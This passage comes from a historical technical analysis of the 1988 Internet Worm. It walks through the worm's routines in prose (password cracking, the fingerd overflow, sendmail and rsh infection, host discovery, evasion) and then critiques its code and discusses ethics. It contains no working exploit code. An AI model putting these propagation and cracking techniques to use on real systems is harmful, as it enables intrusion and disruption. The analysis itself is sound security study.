supported the rsh command \(identifying it as existing and having 
BSD-derived networking services\) by calling supports_rsh. If the 
host did support rsh, it was entered into the hosts list if not 
already present, and a call to infect was made for that host. If 
a successful infection occurred, the routine returned early with 
a value of TRUE \(1\). 

5.2.4. attack_user 

This routine was called after a user password was broken. It has 
some incorrect code and may not work properly on every 
architecture because a subroutine call was missing an argument. 
However, on Suns and VAXen, the code will work because the 
missing argument was supplied as an extra argument to the 
previous call, and the order of the arguments on the stack 
matches between the two routines. It was largely a coincidence 
that this worked. The routine attempted to open a .forward file 
in the the user's home directory, and then for each host and user 
name present in that file, it called the hul routine. It then did 
the same thing with the .rhosts file, if present, in the user's 
home directory. 

5.2.5. checkother 

This routine was to see if another worm was present on this 
machine and is a companion routine to other_sleep. First, a 
random value was checked: with a probability of 1 in 7, the 
routine returned without ever doing anything\320these worms 
become immortal in the sense that they never again participated 
in the process of thinning out multiple local worms. Otherwise, 
the worm created a socket and tried to connect to the local 
``worm port''\320 23357. If the connection was successful, an 
exchange of challenges was made to verify that the other side was 
actually a fellow worm. If so, a random value was written to the 
other side, and a value was read from the socket. If the sum of 
the value sent plus the value read was even, the local worm set 
its pleasequit variable to 1, thus marking it for eventual self-
destruction. The socket was then closed, and the worm opened a 
new socket on the same port \(if it was not destined to self-
destruct\) and set other_fd to that socket to listen for other 
worms. If any errors were encountered during this procedure, the 
worm involved set other_fd to -1 and it returned from the 
routine. This meant that any error caused the worm to be 
immortal, too. 

5.2.6. crack_0 

This routine first scanned the /etc/hosts.equiv file, adding new 
hosts to the global list of hosts and setting the \257ags field 
to mark them as equivalent.  Calls were made to name2host and 
getaddrs. Next, a similar scan was made of the /.rhosts file 
using the exact same calls. The code then called setpwent to open 
the /etc/passwd file. A loop was performed as long as passwords 
could be read: Every 10th entry, a call was made to other_sleep 
with a timeout of 0. For each user, an attempt was made to open 
the file .forward 
14 
in the home directory of that user, and read the hostnames 
therein. These hostnames were also added to the host list and 
marked as equivalent. The encrypted password, home directory, and 
gecos field for each user was stored into the pwd structure. 
After all user entries were read, the endpwent routine was 
invoked, and the cmode variable was set to 1. 

5.2.7. crack_1 

This routine tried to break passwords. It looped until all 
accounts had been tried, or until the next group of 50 accounts 
had been tested. In the loop: A call was made to other_sleep with 
a parameter of zero each time the loop index modulo 10 was zero 
\(i.e., every 10 calls\). Repeated calls were made to 
try_password with the values discussed earlier in \2474-8b. Once 
all accounts had been tried, the variable cmode was set to 2. 

5.2.8. crack_2 

This routine used the mini-dictionary in an attempt to break user 
passwords \(see Appendix A\). The dictionary was first permuted 
\(using the permute\) call. Each word was decrypted in- place by 
XORing its bytes with 0x80. The decrypted word was then passed to 
the try_password routine for each user account. The word was then 
re-encrypted. A global index, named nextw was incremented to 
point to the next dictionary entry. The nextw index is also used 
in doit to determine if enough effort had been expended so that 
the worm could ``...go gently into that good night.'' When no 
more words were left, the variable cmode was set to 3. There are 
two interesting points to note in this routine: the reverse of 
these words were not tried, although that would seem like a 
logical thing to do, and all words were encrypted and decrypted 
in place rather than in a temporary buffer. This is less 
efficient than a copy while masking since no re-encryption ever 
needs to be done. As discussed in the next section, many examples 
of unnecessary effort such as this were present in the program. 
Furthermore, the entire mini-dictionary was decrypted all at once 
rather than a word at a time. This would seem to lessen the 
benefit of encrypting those words at all, since the entire 
dictionary would then be present in memory as plaintext during 
the time all the words were tried. 

5.2.9. crack_3 

This was the last password cracking routine. It opened 
/usr/dict/words, and for each word found it called try_password 
against each account. If the first letter of the word was a 
capital, it was converted to lower case and retried. After all 
words were tried, the variable cmode was incremented and the 
routine returned. In this routine, no calls to other_sleep were 
interspersed, thus leading to processes that ran for a long time 
before checking for other worms on the local machine. Also of 
note, this routine did not try the reverse of words either! 

5.2.10. cracksome 

This routine was a simple switch statement on an external 
variable named cmode and it implemented the five strategies 
discussed in \2474-8 of this paper. State zero called crack_0, 
state one called crack_1,  state two called crack_2,  and state 
three called crack_3.  The default case simply returned. 

5.2.11. crypt 

This routine took a key and a salt, then performed the UNIX 
password encryption function on a block of zero bits. The return 
value of the routine was a pointer to a character string of 13 
characters representing the encoded password. The routine was 
highly optimized and differs considerably from the standard 
library version of the same routine. It called the following 
routines: compkeys, mungE, des, and ipi. A routine, setupE,  was 
also present and was associated with this code, but it was never 
referenced. It appears to duplicate the functionality of the 
mungE function. 

5.2.12. h_addaddr 

This routine added alternate addresses to a host entry in the 
global list if they were not already present. 

5.2.13. h_addname 

This routine added host aliases \(names\) to a given host entry. 
Duplicate entries were suppressed. 

5.2.14. h_addr2host 

The host address provided to the routine was checked against each 
entry in the global host list to see if it was already present. 
If so, a pointer to that host entry was returned. If not, and if 
a parameter flag was set, a new entry was initialized with the 
argument address and a pointer to it was returned. 

5.2.15. h_clean 

This routine traversed the host list and removed any entries 
marked as infected or immune \(leaving hosts not yet tried\). 

5.2.16. h_name2host 

Just like h_addr2host except the comparison was done by name with 
all aliases. 

5.2.17. ha 

This routine tried to infect hosts on remote networks. First, it 
checked to see if the gateways list had entries; if not, it 
called rt_init.  Next, it constructed a list of all IP addresses 
for gateway hosts that responded to the try_telnet routine. The 
list of host addresses was randomized by permute.  Then, for each 
address in the list so constructed, the address was masked with 
the value returned by netmaskfor and the result was passed to the 
attack_network routine. If an attack was successful, the routine 
exited early with a return value of TRUE. 

5.2.18. hg 

This routine attempted to infect gateway machines. It first 
called rt_init to reinitialize the list of gateways, and then for 
each gateway it called the main infection routine, infect,  with 
the gateway as an argument. As soon as one gateway was 
successfully infected, the routine returned TRUE. 

5.2.19. hi 

This routine tried to infect hosts whose entries in the hosts 
list were marked as equivalent.  The routine traversed the global 
host list looking for such entries and then calling infect with 
those hosts. A successful infection returned early with the value 
TRUE. 

5.2.20. hl 

This routine was intended to attack hosts on directly-connected 
networks. For each alternate address of the current host, the 
routine attack_network was called with an argument consisting of 
the address logically and-ed with the value of netmask for that 
address. A success caused the routine to return early with a 
return value of TRUE. 

5.2.21. hul 

This function attempted to attack a remote host via a particular 
user. It first checked to make sure that the host was not the 
current host and that it had not already been marked as infected. 
Next, it called getaddrs to be sure there was an address to be 
used. It examined the username for punctuation characters, and 
returned if any were found. It then called other_sleep with an 
argument of 1. Next, the code tried the attacks described in 
\2474-10. Calls were made to sendworm if either attack succeeded 
in establishing a shell on the remote machine. 

5.2.22. if_init 

This routine constructed the list of interfaces using ioctl 
calls. In summary, it obtained information about each interface 
that was up and running, including the destination address in 
point-to-point links, and any netmask for that interface. It 
initialized the me pointer to the first non-loopback address 
found, and it entered all alternate addresses in the address 
list. 

5.2.23. infect 

This was the main infection routine. First, the host argument was 
checked to make sure that it was not the current host, that it 
was not currently infected, and that it had not been determined 
to be immune. Next, a check was made to be sure that an address 
for the host could be found by calling getaddrs.  If no address 
was found, the host was marked as immune and the routine returned 
FALSE. Next, the routine called other_sleep with a timeout of 1. 
Following that, it tried, in succession, calls to try_rsh,  
try_fingerd,  and try_sendmail.  If the calls to try_rsh or 
try_fingerd 

succeeded, the file descriptors established by those invocations 
were passed as arguments to the sendworm call. If any of the 
three infection attempts succeeded, infect returned early with a 
value of TRUE. Otherwise, the routine returned FALSE. 

5.2.24. loadobject 

This routine read an object file into the objects structure in 
memory. The file was opened and the size found with a call to the 
library routine fstat.  A buffer was malloc'd of the appropriate 
size, and a call to read was made to read the contents of the 
file. The buffer was encrypted with a call to xorbuf,  then 
transferred into the objects array. The suffix of the name 
\(e.g., sun3.o, l1.c, vax.o\) was saved in a field in the 
structure, as was the size of the object. 

5.2.25. makemagic 

The routine used the library random call to generate a random 
number for use as a challenge number. Next, it tried to connect 
to the telnet port \(#23\) of the target host, using each 
alternate address currently known for that host. If a successful 
connection was made, the library call getsockname was called to 
get the canonical IP address of the current host relative to the 
target. Next, up to 1024 attempts were made to establish a TCP 
socket, using port numbers generated by taking the output of the 
random number generator modulo 32767. If the connection was 
successful, the routine returned the port number, the file 
descriptor of the socket, the canonical IP address of the current 
host, and the challenge number. 

5.2.26. netmaskfor 

This routine stepped through the interfaces array and checked the 
given address against those interfaces. If it found that the 
address was reachable through a connected interface, the netmask 
returned was the netmask associated with that interface. 
Otherwise, the return was the default netmask based on network 
type \(Class A, Class B, Class C\). 

5.2.27. other_sleep 

This routine checked a global variable named other_fd.  If the 
variable was less than zero, the routine simply called sleep with 
the provided timeout argument, then returned. Otherwise, the 
routine waited on a select system call for up to the value of the 
timeout. If the timeout expired, the routine returned. Otherwise, 
if the select return code indicated there was input pending on 
the other_fd descriptor, it meant there was another worm on the 
current machine. A connection was established and an exchange of 
``magic'' numbers was made to verify identity. The local worm 
then wrote a random number \(produced by random\) to the other 
worm via the socket. The reply was read and a check was made to 
ensure that the response came from the localhost \(127.0.0.1\). 
The file descriptor was closed. If the random value sent plus the 
response was an odd number, the other_fd variable was set to -1 
and the pleasequit variable was set to 1. This meant that the 
local worm would die when conditions were right \(cf. doit \), 
and that it would no longer attempt to contact other worms on the 
local machine. If the sum was even, the other worm was destined 
to die. 

5.2.28. permute 

This routine randomized the order of a list of objects. This was 
done by executing a loop once for each item in the list. In each 
iteration of the loop, the random number generator was called 
modulo the number of items in the list. The item in the list 
indexed by that value was swapped with the item in the list 
indexed by the current loop value \(via a call to bcopy\). 

5.2.29. rt_init 

This initialized the list of gateways. It started by setting an 
external counter, ngateways,  to zero. Next, it invoked the 
command ``/usr/ucb/netstat -r -n'' using a popen call. The code 
then looped while output was received from the netstat command: A 
line was read. A call to other_sleep was made with a timeout of 
zero. The input line was parsed into a destination and a gateway. 
If the gateway was not a valid IP address, or if it was the 
loopback address \(127.0.0.1\), it was discarded. The value was 
then compared against all the gateway addresses already known; 
duplicates were skipped. It was also compared against the list of 
local interfaces \(local networks\), and discarded if a 
duplicate. Otherwise, it was added to the list of gateways and 
the counter incremented. 

5.2.30. scan_gateways 

First, the code called permute to randomize the gateways list. 
Next, it looped over each gateway or the first 20, whichever was 
less: A call was made to other_sleep with a timeout of zero. The 
gateway IP address was searched for in the host list; a new entry 
was allocated for the host if none currently existed. The gateway 
flag was set in the flags field of the host entry. A call was 
made to the library routine gethostbyaddr with the IP number of 
the gateway. The name, aliases and address fields were added to 
the host list, if not already present. Then a call was made to 
gethostbyname and alternate addresses were added to the host 
list. After this loop was executed, a second loop was started 
that did effectively the same thing as the first! There is no 
clear reason why this was done, unless it is a remnant of earlier 
code, or a stub for future additions. 

5.2.31. send_message 

This routine made a call to random and 14 out of 15 times 
returned without doing anything. In the 15th case, it opened a 
stream socket to host ``ernie.berkeley.edu'' and then tried to 
send an uninitialized byte using the sendto call. This would not 
work \(using a UDP send on a TCP socket\). 

5.2.32. sendworm 

This routine sent the worm code over a connected TCP circuit to a 
remote machine. First it checked to make sure that the objects 
table held a copy of the l1.c code \(see Appendix B\). Next, it 
called makemagic to get a local socket established and to 
generate a challenge string. Then, it encoded and wrote the 
script detailed previously in \2474-2a. Finally, it called 
waithit and returned the result code of that routine. The object 
files shipped across the link were decrypted in memory first by a 
call to xorbuf and then re-encrypted afterwards. 

5.2.33. supports_rsh 

This routine determined if the target host, specified as an 
argument, supported the BSD- derived rsh protocol. It did this by 
creating a socket and attempting a TCP connection to port 514 on 
the remote machine. A timeout or connect failure caused a return 
of FALSE; otherwise, the socket was closed and the return value 
was TRUE. 

5.2.34. supports_telnet 

This routine determined if a host was reachable and supported the 
telnet protocol \(i.e., was probably not a router or similar 
``dumb'' box\). It was similar to supports_rsh in nature. The 
code established a socket, connected to the remote machine on 
port 23, and returned FALSE if an error or timeout occurred; 
otherwise, the socket was closed and TRUE was returned. 

5.2.35. try_fingerd 

This routine tried to establish a connection to a remote finger 
daemon on the given host by connecting to port 79. If the 
connection succeeded, it sent across an overfull buffer as 
described in \2474-8b and waited to see if the other side became 
a shell. If so, it returned the file descriptors to the caller; 
otherwise, it closed the socket and returned a failure code. 

5.2.36. try_password 

This routine called crypt with the password attempt and compared 
the result against the encrypted password in the pwd entry for 
the current user. If a match was found, the unencrypted password 
was copied into the pwd structure, and the routine attack_user 
was invoked. 

5.2.37. try_rsh 

This function created two pipes and then forked a child process. 
The child process attempted to rexec a remote shell on the host 
specified in the parameters, using the specified username and 
password. Then the child process tried to invoke the rsh command 
by attempting to run, in order, ``/usr/ucb/rsh,'' 
``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell 
succeeded, the function returned the file descriptors of the open 
pipe. Otherwise, it closed all file descriptors, killed the child 
with a SIGKILL, and reaped it with a call to wait3. 

5.2.38. try_sendmail 

This routine attempted to establish a connection to the SMTP port 
\(#25\) on the remote host. If successful, it conducted the 
dialog explained in \2474-2b. It then called the waithit routine 
to see if the infection ``took.'' Return codes were checked after 
each line was transmitted, and if a return code indicated a 
problem, the routine aborted after sending a ``quit'' message. 

5.2.39. waithit 

This function acted as the bootstrap server for a vector program 
on a remote machine. It waited for up to 120 seconds on the 
socket created by the makemagic routine, and if no connection was 
made it closed the socket and returned a failure code. Likewise, 
if the first thing received was not the challenge string shipped 
with the bootstrap program, the socket was closed and the routine 
returned. The routine decrypted each object file using xorbuf and 
sent it across the connection to the vector program \(see 
Appendix B\). Then a script was transmitted to compile and run 
the vector. This was described in \2474-4. If the remote host was 
successfully infected, the infected flag was set in the host 
entry and the socket closed. Otherwise, the routine sent rm 
command strings to delete each object file. The function returned 
the success or failure of the infection. 

5.2.40. xorbuf 

This routine was somewhat peculiar. It performed a simple 
encryption/decryption function by XORing the buffer passed as an 
argument with the first 10 bytes of the xorbuf routine itself! 
This code would not work on a machine with a split I/D space or 
on tagged architectures. 

6. Analysis of the Code 

6.1. Structure and Style 

An examination of the reverse-engineered code of the worm is 
instructive. Although it is not the same as reading the original 
code, it does reveal some characteristics of the author\(s\). One 
conclusion that may surprise some people is that the quality of 
the code is mediocre, and might even be considered poor. For 
instance, there are places where calls are made to functions with 
either too many or too few arguments. Many routines have local 
variables that are either never used, or are potentially used 
before they are initialized. In at least one location, a struct 
is passed as an argument rather than the address of the struct. 
There is also dead code, as routines that are never referenced, 
and as code that cannot be executed because of conditions that 
are never met \(possibly bugs\). It appears that the author\(s\) 
never used the lint utility on the program. At many places in the 
code, there are calls on system routines and the return codes are 
never checked for success. In many places, calls are made to the 
system heap routine, malloc and the result is immediately used 
without any check. Although the program was configured not to 
leave a core file or other evidence if a fatal failure occurred, 
the lack of simple checks on the return codes is indicative of 
sloppiness; it also suggests that the code was written and run 
with minimal or no testing. It is certainly possible that some 
checks were written into the code and elided subject to 
conditional compilation flags. However, there would be little 
reason to remove those checks from the production version of the 
code. The structures chosen for some of the internal data are 
also revealing. Everything was represented as linked lists of 
structures. All searches were done as linear passes through the 
appropriate list. Some of these lists could get quite long and 
doubtless that considerable CPU time was spent by the worm just 
maintaining and searching these lists. A little extra code to 
implement hash buckets or some form of sorted lists would have 
added little overhead to the program, yet made it much more 
efficient \(and thus quicker to infect other hosts and less 
obvious to system watchers\). Linear lists may be easy to code, 
but any experienced programmer or advanced CS student should be 
able to implement a hash table or lists of hash buckets with 
little difficulty. Some effort was duplicated in spots. An 
example of this was in the code that tried to break passwords. 
Even if the password to an account had been found in an earlier 
stage of execution, the worm would encrypt every word in the 
dictionary and attempt a match against it. Similar redundancy can 
be found in the code to construct the lists of hosts to infect. 
There are locations in the code where it appears that the 
author\(s\) meant to execute a particular function but used the 
wrong invocation. The use of the UDP send on a TCP socket is one 
glaring example. Another example is at the beginning of the 
program where the code sends a KILL signal to its parent process. 
The surrounding code gives strong indication that the user 
actually meant to do a killpg instead but used the wrong call. 
The one section of code that appears particularly well-thought-
out involves the crypt routines used to check passwords. As has 
been noted in [Seel88], this code is nine times faster than the 
standard Berkeley crypt function. Many interesting modifications 
were made to the algorithm, and the routines do not appear to 
have been written by the same author as the rest of the code. 
Additionally, the routines involved have some support for both 
encryption anddecryption\320even though only encryption was 
needed for the worm. This supports the assumption that this 
routine was written by someone other than the author\(s\) of the 
program, and included with this code. It would be interesting to 
discover where this code originated and how it came to be in the 
Worm program. The program could have been much more virulent had 
the author\(s\) been more experienced or less rushed in her/his 
coding. However, it seems likely that this code had been 
developed over a long period of time, so the only conclusion that 
can be drawn is that the author\(s\) was sloppy or careless \(or 
both\), and perhaps that the release of the worm was premature. 

6.2. Problems of Functionality 

There is little argument that the program was functional. In 
fact, we all wish it had been less capable! However, we are lucky 
in the sense that the program had flaws that prevented it from 
operating to the fullest. For instance, because of an error, the 
code would fail to infect hosts on a local area network even 
though it might identify such hosts. Another example of 
restricted functionality concerns the gathering of hostnames to 
infect. As noted already, the code failed to gather host names 
>From user .rhosts files early on. It also did not attempt to 
collect host names from other user and system files containing 
such names \(e.g., /etc/hosts.lpd\). Many of the operations could 
have been done ``smarter.'' The case of using linear structures 
has already been mentioned. Another example would have been to 
sort user passwords by the salt used. If the same salt was 
present in more than one password, then all those passwords could 
be checked in parallel as a single pass was made through the 
dictionaries. On our machine, 5% of the 200 passwords share the 
same salts, for instance. No special advantage was taken if the 
root password was compromised. Once the root password has been 
broken, it is possible to fork children that set their uid and 
environment variables to match each designated user. These 
processes could then attempt the rsh attack described earlier in 
this report. Instead, root is treated as any other account. It 
has been suggested to me that this treatment of root may have 
been a conscious choice of the worm author\(s\). Without knowing 
the true motivation of the author, this is impossible to decide. 
However, considering the design and intent of the program, I find 
it difficult to believe that such exploitation would have been 
omitted if the author had thought of it. The same attack used on 
the finger daemon could have been extended to the Sun version of 
the program, but was not. The only explanations that come to mind 
why this was not done are that the author lacked the motivation, 
the ability, the time, or the resources to develop a version for 
the Sun. However, at a recent meeting, Professor Rick Rashid of 
Carnegie-Mellon University was heard to claim that Robert T. 
Morris, the alleged author of the worm, had revealed the fingerd 
bug to system administrative staff at CMU well over a year ago. 
15 
Assuming this report is correct and the worm author is indeed Mr. 
Morris, it is obvious that there was sufficient time to construct 
a Sun version of the code. In fact, I asked three Purdue graduate 
students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N. 
Griffoen to develop a Sun 3 version of the attack, and they did 
so in under three hours. The Worm author certainly must have had 
access to Suns or else he would not have been able to provide Sun 
binaries to accompany the operational worm. Motivation should 
also not be a factor considering everything else present in the 
program. With time and resources available, the only reason I 
cannot immediately rule out is that he lacked the knowledge of 
how to implement a Sun version of the attack. This seemsunlikely, 
but given the inconsistent nature of the rest of the code, it is 
certainly a possibility. However, if this is the case, it raises 
a new question: was the author of the Worm the original author of 
the VAX fingerd attack? Perhaps the most obvious shortcoming of 
the code is the lack of understanding about propagation and load. 
The reason the worm was spotted so quickly and caused so much 
disruption was because it replicated itself exponentially on some 
networks, and because each worm carried no history with it. 
Admittedly, there was a check in place to see if the current 
machine was already infected, but one out of every seven worms 
would never die even if there was an existing infestation. 
Furthermore, worms marked for self-destruction would continue to 
execute up to the point of having made at least one complete pass 
through the password file. Many approaches could have been taken 
by the author\(s\) to slow the growth of the worm or prevent 
reinfestation; little is to be gained from explaining them here, 
but their absence from the worm program is telling. Either the 
author\(s\) did not have any understanding of how the program 
would propagate, or else she/he/they did not care; the existence 
in the Worm of mechanisms to limit growth tends to indicate that 
it was a lack of understanding rather than indifference. Some of 
the algorithms used by the Worm were reasonably clever. One in 
particular is interesting to note: when trying passwords from the 
built-in list, or when trying to break into connected hosts, the 
worm would randomize the list of candidates for trial. Thus, if 
more than one worm were present on the local machine, they would 
be more likely to try candidates in a different order, thus 
maximizing their coverage. This implies, however \(as does the 
action of the pleasequit variable\) that the author\(s\) was not 
overly concerned with the presence of multiple worms on the same 
machine. More to the point, multiple worms were allowed for a 
while in an effort to maximize the spread of the infection. This 
also supports the contention that the author did not understand 
the propagation or load effects of the Worm. The design of the 
vector program, the ``thinning'' protocol, and the use of the 
internal state machine were all clever and non-obvious. The 
overall structure of the program, especially the code associated 
with IP addresses, indicates considerable knowledge of networking 
and the routines available to support it. The knowledge evidenced 
by that code would indicate extensive experience with networking 
facilities. This, coupled with some of the errors in the Worm 
code related to networking, further support the thesis that the 
author was not a careful programmer\320the errors in those parts 
of the code were probably not errors because of ignorance or 
inexperience. 

6.3. Camouflage 

Great care was taken to prevent the worm program from being 
stopped. This can be seen by the caution with which new files 
were introduced into a machine, including the use of random 
challenges. It can be seen by the fact that every string compiled 
into the worm was encrypted to prevent simple examination. It was 
evidenced by the care with which files associated with the worm 
were deleted from disk at the earliest opportunity, and the 
corresponding contents were encrypted in memory when loaded. It 
was evidenced by the continual forking of the process, and the 
\(faulty\) check for other instances of the worm on the local 
host. The code also evidences precautions against providing 
copies of itself to anyone seeking to stop the worm. It sets its 
resource limits so it cannot dump a core file, and it keeps 
internal data encrypted until used. Luckily, there are other 
methods of obtaining core files and data images, and researchers 
were able to obtain all the information they needed to 
disassemble and reverse-engineer the code. There is no doubt, 
however, that the author\(s\) of the worm intended to make such a 
task as difficult as possible. 

6.4. Specific Comments 

Some more specific comments are worth making. These are directed 
to particular aspects of the code rather than the program as a 
whole. 

6.4.1. The sendmail attack 

Many sites tend to experience substantial loads because of heavy 
mail traffic. This is especially true at sites with mailing list 
exploders. Thus, the administrators at those sites have 
configured their mailers to queue incoming mail and process the 
queue periodically. The usual configuration is to set sendmail to 
run the queue every 30 to 90 minutes. The attack through sendmail 
would fail on these machines unless the vector program were 
delivered into a nearly empty queue within 120 seconds of it 
being processed. The reason for this is that the infecting worm 
would only wait on the server socket for two minutes after 
delivering the ``infecting mail.'' Thus, on systems with delayed 
queues, the vector process would not get built in time to 
transfer the main worm program over to the target. The vector 
process would fail in its connection attempt and exit with a 
non-zero status. Additionally, the attack through sendmail 
invoked the vector program without a specific path. That is, the 
program was invoked with ``foo'' instead of ``./foo'' as was done 
with the shell-based attack. As a result, on systems where the 
default path used by sendmail's shell did not contain the current 
directory \(``.''\), the invocation of the code would fail. It 
should be noted that such a failure interrupts the processing of 
subsequent commands \(such as the rm of the files\), and this may 
be why many system administrators discovered copies of the vector 
program source code in their /usr/tmp directories. 

6.4.2. The machines involved 

As has already been noted, this attack was made only on Sun 3 
machines and VAX machines running BSD UNIX.  It has been observed 
in at least one mailing list that had the Sun code been compiled 
with the -mc68010 flag, more Sun machines would have fallen 
victim to the worm. It is a matter of some curiosity why more 
machines were not targeted for this attack. In particular, there 
are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on 
the net. 
16 
If binary files for those had also been included, the worm could 
have spread much further. As it was, some locations such as Ohio 
State were completely spared the effects of the worm because all 
their ``known'' machines were of a type that the worm could not 
infect. Since the author of the program knew how to break into 
arbitrary UNIX machines, it seems odd that he/she did not attempt 
to compile the program on foreign architectures to include with 
the worm. 

6.4.3. Portability considerations 

The author\(s\) of the worm may not have had much experience with 
writing portable UNIX code, including shell scripts. Consider 
that in the shell script used to compile the vector, the 
following command is used: if [ -f sh ] The use of the [ 
character as a synonym for the test function is not universal. 
UNIX users with experience writing portable shell files tend to 
spell out the operator test rather than rely on therebeing a link 
to a file named ``['' on any particular system. They also know 
that the test operator is built-in to many shells and thus faster 
than the external [ variant. The test invocation used in the worm 
code also uses the -f flag to test for presence of the file named 
sh.  This provided us with the worm ``condom'' published Thursday 
night: 
17 
creating a directory with the name sh in /usr/tmp causes this 
test to fail, as do later attempts to create executable files by 
that name. Experienced shell programmers tend to use the -e 
\(exists\) flag in circumstances such as this, to detect not only 
directories, but sockets, devices, named FIFOs, etc. Other 
colloquialisms are present in the code that bespeak a lack of 
experience writing portable code. One such example is the code 
loop where file units are closed just after the vector program 
starts executing, and again in the main program just after it 
starts executing. In both programs, code such as the following is 
executed: for \(i = 0; i < 32; i++\) close\(i\); The portable way 
to accomplish the task of closing all file descriptors \(on 
Berkeley-derived systems\) is to execute: for \(i = 0; i < 
getdtablesize\(\); i++\) close \(i\); or the even more efficient 
for \(i = getdtablesize\(\)-1; i >= 0; i--\) close\(i\); This is 
because the number of file units available \(and thus open\) may 
vary from system to system. 

6.5. Summary 

Many other examples can be drawn from the code, but the points 
should be obvious by now: the author of the worm program may have 
been a moderately experienced UNIX programmer, but s/he was by no 
means the ``UNIX Wizard'' many have been claiming. The code 
employs a few clever techniques and tricks, but there is some 
doubt if they are all the original work of the Worm author. The 
code seems to be the product of an inexperienced or sloppy 
programmer. The person \(or persons\) who put this program 
together appears to lack fundamental insight into some 
algorithms, data structures, and network propagation, but at the 
same time has some very sophisticated knowledge of network 
features and facilities. The code does not appear to have been 
tested \(although anything other than unit testing would not be 
simple to do\), or else it was prematurely released. Actually, it 
is possible that both of these conclusions are correct. The 
presence of so much dead and duplicated code coupled with the 
size of some data structures \(such as the 20-slot object code 
array\) argues that the program was intended to be more 
comprehensive. 

7. Conclusions 

It is clear from the code that the worm was deliberately designed 
to do two things: infect as many machines as possible, and be 
difficult to track and stop. There can be no question that this 
was in any way an accident, although its release may have been 
premature. It is still unknown if this worm, or a future version 
of it, was to accomplish any other tasks. Although an author has 
been alleged \(Robert T. Morris\), he has not publicly confessed 
nor has the matter been definitively proven. Considering the 
probability of both civil and criminal legal actions, a 
confession and an explanation are unlikely to be forthcoming any 
time soon. Speculation has centered on motivations as diverse as 
revenge, pure intellectual curiosity, and a desire to impress 
someone. This must remain speculation for the time being, 
however, since we do not have access to a definitive statement 
>From the author\(s\). At the least, there must be some question 
about the psychological makeup of someone who would build and run 
such software. 
18 
Many people have stated that the authors of this code 
19 
must have been ``computer geniuses'' of some sort. I have been 
bothered by that supposition since first hearing it, and after 
having examined the code in some depth, I am convinced that this 
program is not evidence to support any such claim. The code was 
apparently unfinished and done by someone clever but not 
particularly gifted, at least in the way we usually associate 
with talented programmers and designers. There were many bugs and 
mistakes in the code that would not be made by a careful, 
competent programmer. The code does not evidence clear 
understanding of good data structuring, algorithms, or even of 
security flaws in UNIX. It does contain clever exploitations of 
two specific flaws in system utilities, but that is hardly 
evidence of genius. In general, the code is not that impressive, 
and its ``success'' was probably due to a large amount of luck 
rather than any programming skill possessed by the author. Chance 
favored most of us, however. The effects of this worm were 
\(largely\) benign, and it was easily stopped. Had the code been 
tested and developed further by someone more experienced, or had 
it been coupled with something destructive, the toll would have 
been considerably higher. I can easily think of several dozen 
people who could have written this program, and not only done it 
with far fewer \(if any\) errors, but made it considerably more 
virulent. Thankfully, those individuals are all responsible, 
dedicated professionals who would not consider such an act. What 
we learn from this about securing our systems will help determine 
if this is the only such incident we ever need to analyze. This 
attack should also point out that we need a better mechanism in 
place to coordinate information about security flaws and attacks. 
The response to this incident was largely ad hoc, and resulted in 
both duplication of effort and a failure to disseminate valuable 
information to sites that needed it. Many site administrators 
discovered the problem from reading the newspaper or watching the 
television. The major sources of information for many of the 
sites affected seems to have been Usenet news groups and a 
mailing list I put together when the worm was first discovered. 
Although useful, these methods did not ensure timely, widespread 
dissemination of useful information \320 especially since they 
depended on the Internet to work! Over three weeks after this 
incident some sites are still not reconnected to the Internet. 

This is the second time in six months that a major panic has hit 
the Internet community.The first occurred in May when a rumor 
swept the community that a ``logic bomb'' had been planted in Sun 
software by a disgruntled employee. Many, many sites turned their 
system clocks back or they shut off their systems to prevent 
damage. The personnel at Sun Microsystems responded to this in an 
admirable fashion, conducting in-house testing to isolate any 
such threat, and issuing information to the community about how 
to deal with the situation. Unfortunately, almost everyone else 
seems to have watched events unfold, glad that they were not the 
ones who had to deal with the situation. The worm has shown us 
that we are all affected by events in our shared environment, and 
we need to develop better information methods outside the network 
before the next crisis. This whole episode should cause us to 
think about the ethics and laws concerning access to computers. 
The technology we use has developed so quickly it is not always 
simple to determine where the proper boundaries of moral action 
may be. Many senior computer professionals started their careers 
years ago by breaking into computer systems at their colleges and 
places of employment to demonstrate their expertise. However, 
times have changed and mastery of computer science and computer 
engineering now involves a great deal more than can be shown by 
using intimate knowledge of the flaws in a particular operating 
system. Entire businesses are now dependent, wisely or not, on 
computer systems. People's money, careers, and possibly even 
their lives may be dependent on the undisturbed functioning of 
computers. As a society, we cannot afford the consequences of 
condoning or encouraging behavior that threatens or damages 
computer systems. As professionals, computer scientists and 
computer engineers cannot afford to tolerate the romanticization 
of computer vandals and computer criminals. This incident should 
also prompt some discussion about distribution of security-
related information. In particular, since hundreds of sites have 
``captured'' the binary form of the worm, and since personnel at 
those sites have utilities and knowledge that enables them to 
reverse-engineer the worm code, we should ask how long we expect 
it to be beneficial to keep the code unpublished? As I mentioned 
in the introduction, at least five independent groups have 
produced reverse-engineered versions of the worm, and I expect 
many more have been done or will be attempted, especially if the 
current versions are kept private. Even if none of these versions 
is published in any formal way, hundreds of individuals will have 
had access to a copy before the end of the year. Historically, 
trying to ensure security of software through secrecy has proven 
to be ineffective in the long term. It is vital that we educate 
system administrators and make bug fixes available to them in 
some way that does not compromise their security. Methods that 
prevent the dissemination of information appear to be completely 
contrary to that goal. Last, it is important to note that the 
nature of both the Internet and UNIX helped to defeat the worm as 
well as spread it. The immediacy of communication, the ability to 
copy source and binary files from machine to machine, and the 
widespread availability of both source and expertise allowed 
personnel throughout the country to work together to solve the 
infection even despite the widespread disconnection of parts of 
the network. Although the immediate reaction of some people might 
be to restrict communication or promote a diversity of 
incompatible software options to prevent a recurrence of a worm, 
that would be entirely the wrong reaction. Increasing the 
obstacles to open communication or decreasing the number of 
people with access to in-depth information will not prevent a 
determined attacker\320it will only decrease the pool of 
expertise and resources available to fight such an attack. 
Further, such an attitude would be contrary to the whole purpose 
of having an open, research-oriented network. The Worm was caused 
by a breakdown of ethics as well as lapses in security\320a 
purely technological attempt at prevention will not address the 
full problem, and may just cause new difficulties. 

Acknowledgments 

Much of this analysis was performed on reverse-engineered 
versions of the worm code. The following people were involved in 
the production of those versions: Donald J. Becker of Harris 
Corporation, Keith Bostic of Berkeley, Donn Seeley of the 
University of Utah, Chris Torek of the University of Maryland, 
Dave Pare of FX Development, and the team at MIT: Mark W. Eichin, 
Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis, 
